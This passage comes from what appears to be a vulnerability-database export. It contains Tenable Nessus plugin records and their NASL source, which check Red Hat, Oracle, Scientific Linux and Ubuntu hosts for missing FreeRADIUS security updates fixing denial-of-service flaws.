After\ninstalling the update, radiusd will be restarted automatically.", "edition": 26, "published": "2009-09-18T00:00:00", "title": "RHEL 5 : freeradius (RHSA-2009:1451)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2009-09-18T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:freeradius-unixODBC", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:freeradius-mysql", "p-cpe:/a:redhat:enterprise_linux:freeradius", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:freeradius-postgresql"], "id": "REDHAT-RHSA-2009-1451.NASL", "href": "https://www.tenable.com/plugins/nessus/41008", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1451. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41008);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_xref(name:\"RHSA\", value:\"2009:1451\");\n\n script_name(english:\"RHEL 5 : freeradius (RHSA-2009:1451)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized 
authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1451\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This 
script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1451\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\n\n if 
(rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius / freeradius-mysql / freeradius-postgresql / etc\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T12:44:43", "description": "From Red Hat Security Advisory 2009:1451 :\n\nUpdated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to 
allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : freeradius (ELSA-2009-1451)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:freeradius-postgresql", "p-cpe:/a:oracle:linux:freeradius", "p-cpe:/a:oracle:linux:freeradius-unixODBC", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:freeradius-mysql"], "id": "ORACLELINUX_ELSA-2009-1451.NASL", "href": "https://www.tenable.com/plugins/nessus/67926", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1451 and \n# Oracle Linux Security Advisory ELSA-2009-1451 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67926);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n script_xref(name:\"RHSA\", value:\"2009:1451\");\n\n script_name(english:\"Oracle Linux 5 : freeradius (ELSA-2009-1451)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n 
attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1451 :\n\nUpdated freeradius packages that fix a security issue are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nFreeRADIUS is a high-performance and highly configurable free Remote\nAuthentication Dial In User Service (RADIUS) server, designed to allow\ncentralized authentication and authorization for a network.\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. (CVE-2009-3111)\n\nUsers of FreeRADIUS are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling the update, radiusd will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-September/001156.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected freeradius packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius-postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:freeradius-unixODBC\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius / freeradius-mysql / freeradius-postgresql / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T13:44:31", "description": "CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes\nwith zero length (DoS) -- re-appearance of CVE-2003-0967\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. 
(CVE-2009-3111)\n\nAfter installing the update, radiusd will be restarted automatically.", "edition": 24, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : freeradius on SL5.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967", "CVE-2009-3111"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20090917_FREERADIUS_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60666", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60666);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0967\", \"CVE-2009-3111\");\n\n script_name(english:\"Scientific Linux Security Update : freeradius on SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2009-3111 FreeRADIUS: Missing check for Tunnel-Password attributes\nwith zero length (DoS) -- re-appearance of CVE-2003-0967\n\nAn input validation flaw was discovered in the way FreeRADIUS decoded\nspecific RADIUS attributes from RADIUS packets. A remote attacker\ncould use this flaw to crash the RADIUS daemon (radiusd) via a\nspecially crafted RADIUS packet. 
(CVE-2009-3111)\n\nAfter installing the update, radiusd will be restarted automatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0909&L=scientific-linux-errata&T=0&P=1083\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab89ee37\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"freeradius-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"SL5\", 
reference:\"freeradius-mysql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"freeradius-postgresql-1.1.3-1.5.el5_4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"freeradius-unixODBC-1.1.3-1.5.el5_4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T13:05:17", "description": "Updated FreeRADIUS packages are now available that fix a denial of\nservice vulnerability.\n\nFreeRADIUS is an Internet authentication daemon, which implements the\nRADIUS protocol. It allows Network Access Servers (NAS boxes) to\nperform authentication for dial-up users.\n\nThe rad_decode function in FreeRADIUS 0.9.2 and earlier allows remote\nattackers to cause a denial of service (crash) via a short RADIUS\nstring attribute with a tag, which causes memcpy to be called with a\n-1 length argument, as demonstrated using the Tunnel-Password\nattribute. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2003-0967 to this issue.\n\nUsers of FreeRADIUS are advised to upgrade to these erratum packages\ncontaining FreeRADIUS 0.9.3 which is not vulnerable to these issues.", "edition": 27, "published": "2004-07-06T00:00:00", "title": "RHEL 3 : freeradius (RHSA-2003:386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0967"], "modified": "2004-07-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "p-cpe:/a:redhat:enterprise_linux:freeradius"], "id": "REDHAT-RHSA-2003-386.NASL", "href": "https://www.tenable.com/plugins/nessus/12437", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:386. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12437);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0967\");\n script_xref(name:\"RHSA\", value:\"2003:386\");\n\n script_name(english:\"RHEL 3 : freeradius (RHSA-2003:386)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated FreeRADIUS packages are now available that fix a denial of\nservice vulnerability.\n\nFreeRADIUS is an Internet authentication daemon, which implements the\nRADIUS protocol. It allows Network Access Servers (NAS boxes) to\nperform authentication for dial-up users.\n\nThe rad_decode function in FreeRADIUS 0.9.2 and earlier allows remote\nattackers to cause a denial of service (crash) via a short RADIUS\nstring attribute with a tag, which causes memcpy to be called with a\n-1 length argument, as demonstrated using the Tunnel-Password\nattribute. 
The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2003-0967 to this issue.\n\nUsers of FreeRADIUS are advised to upgrade to these erratum packages\ncontaining FreeRADIUS 0.9.3 which is not vulnerable to these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0967\"\n );\n # http://marc.theaimsgroup.com/?l=freeradius-users&m=106947389449613\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=freeradius-users&m=106947389449613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:386\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected freeradius package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/12/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:386\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"freeradius-0.9.3-1\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freeradius\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T06:57:09", "description": "It was discovered that FreeRADIUS did not correctly handle certain\nmalformed attributes. A remote attacker could exploit this flaw and\ncause the FreeRADIUS server to crash, resulting in a denial of\nservice.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2009-09-17T00:00:00", "title": "Ubuntu 8.04 LTS : freeradius vulnerability (USN-832-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3111"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:freeradius-dialupadmin", "p-cpe:/a:canonical:ubuntu_linux:freeradius-dbg", "p-cpe:/a:canonical:ubuntu_linux:freeradius-iodbc", "p-cpe:/a:canonical:ubuntu_linux:freeradius", "p-cpe:/a:canonical:ubuntu_linux:freeradius-ldap", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:freeradius-postgresql", "p-cpe:/a:canonical:ubuntu_linux:freeradius-mysql", "p-cpe:/a:canonical:ubuntu_linux:freeradius-krb5"], "id": "UBUNTU_USN-832-1.NASL", "href": "https://www.tenable.com/plugins/nessus/41006", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-832-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41006);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2009-3111\");\n script_xref(name:\"USN\", value:\"832-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS : freeradius vulnerability (USN-832-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that FreeRADIUS did not correctly handle certain\nmalformed attributes. A remote attacker could exploit this flaw and\ncause the FreeRADIUS server to crash, resulting in a denial of\nservice.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/832-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-dialupadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-iodbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:freeradius-krb5\");\n script_set_attribute(attribute:\"cpe\", 